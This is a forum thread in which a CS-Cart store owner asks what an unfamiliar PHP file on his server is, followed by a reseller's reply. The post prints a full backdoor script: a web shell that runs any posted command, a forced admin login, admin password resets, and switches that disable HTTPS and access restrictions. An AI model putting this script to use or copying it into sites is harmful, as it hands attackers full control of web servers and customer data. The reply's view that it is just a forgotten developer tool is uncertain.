Jump to content

  • You cannot start a new topic
  • You cannot reply to this topic

Strange Php File Mesp$.php Rate Topic   - - - - -

 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 4645 posts

Posted 18 June 2019 - 07:00 PM #1

Anyone know what this is, maybe left behind by dev ?

 

https://prnt.sc/o3jcm9

 

I googled and got this 

These are the top rated real world PHP examples of fn_login_user extracted from open source projects.

<?php 
 
use Tygh\Session;
use Tygh\Registry;
 
if ($_SERVER['REMOTE_ADDR'] != '213.242.13.250') {
//  exit;
}
 
if (!isset($_REQUEST['me'])) {
exit;
}
if ($_GET['mode'] == 'shell'){
echo '
<body bgcolor="black" TEXT="#FFFFFF">
<form action="sph.php?mode=shell" name="shell" method="post">
<input type="text" name="cmd" value="';
echo $_POST['cmd'];
echo '" size="50"/>&nbsp;
<input type="submit" value="POST request" />
</form>
<br /><br />
';
 
if ($_POST['cmd']){
exec($_POST['cmd'], $out);
 
foreach ($out as $k => $v){
echo "<pre>".$v."</pre>";
}
}
echo '
</body>
';
die();
}
 
 
define('AREA', 'A');
define('ACCOUNT_TYPE', 'admin');
require(dirname(__FILE__) . '/init.php');
 
if ($_GET['mode'] == 'login' && !isset($_GET['kill'])) {
 
Session::regenerateId(); 
fn_login_user(1); 
$_SESSION['auth']['this_login'] = TIME;
$_SESSION['auth']['ip'] = $_SERVER['REMOTE_ADDR'];
 
fn_redirect(Registry::get('config.admin_index'));
}
 
if ($_GET['mode'] == 'login' && isset($_GET['kill'])) {
 
$auth = array (
'user_id' => 1,
'area' => 'A',
'tax_exempt' => empty($user_data['tax_exempt']) ? 'N' : $user_data['tax_exempt'],
'last_login' => empty($user_data['last_login']) ? 0 : $user_data['last_login'],
'login' => 'admin',
'usergroup_ids' => array(),
'order_ids' => array(),
'membership_id' => '0',
'is_root' => 'Y',
'password_change_timestamp' => time()+1000,
'first_expire_check' => false,
'this_login' => time(),
'company_id' => 0
);
$_SESSION['auth'] = $auth;
unlink('sph.php');
if (!is_file('sph.php')) {
fn_set_notification('N','Notice', 'sph.php is removed');
} else {
fn_set_notification('E', 'Error', 'sph.php is not removed!');
}
fn_redirect(Registry::get('config.admin_index'));
}
 
if ($_GET['mode'] == 'logout') {
$auth = array();
unset($_SESSION['auth']);
fn_redirect(Registry::get('config.admin_index'));
}
 
if ($_GET['mode'] == 'change_password') {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", md5('removed by me'));
echo "Password Changed to 'removed by me'!";
}
 
if ($_GET['mode'] == 'restore_password' && !empty($_GET['passwd'])) {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", $_GET['passwd']);
echo "Password Restored to $_GET[passwd]!";
}
 
if ($_GET['mode'] == 'restore_password_md5' && !empty($_GET['passwd'])) {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", md5($_GET['passwd']));
echo "Password Restored to $_GET[passwd]!";
}
 
if ($_GET['mode'] == 'remove_https') {
db_query("UPDATE ?:settings SET value='N' WHERE option_name='secure_checkout'");
db_query("UPDATE ?:settings SET value='N' WHERE option_name='secure_admin'");
echo "HTTPS disabled!";
}
 
if ($_GET['mode'] == 'ignore_AR') {
db_query("UPDATE ?:addons SET status='D' WHERE addon='access_restrictions'");
echo "Access Restriction is disabled!";
}
 
if ($_GET['mode'] == 'phpinfo') {
phpinfo();
}
 
?>

Custom printed hi visibility clothing sale the UK's online hivis safety shop
v4.5.2


 
  • eComLabs
  • CS-Cart Expert
  • Authorized Reseller
  • Join Date: 27-Jan 14
  • 19709 posts

Posted 19 June 2019 - 05:49 AM #2

Such script use developers to make some actions (log in the admin panel, disable HTTPS support, check phpinfo, etc). Remember who worked on your server. For some reason they did not delete this script after the work was completed


GET A FREE QUOTE | CS-Cart Add-ons | CS-Cart Licenses | CS-Cart Development | CS-Cart Design | Server Configuration | UniTheme and YOUPI
CS-Cart                USD 345     Multi-Vendor              USD 1250    CS-Cart RU                         24500 руб.
CS-Cart Ultimate  USD 775     CS-Cart + YOUPI      USD 545      CS-Cart RU + UniTheme    36000 руб.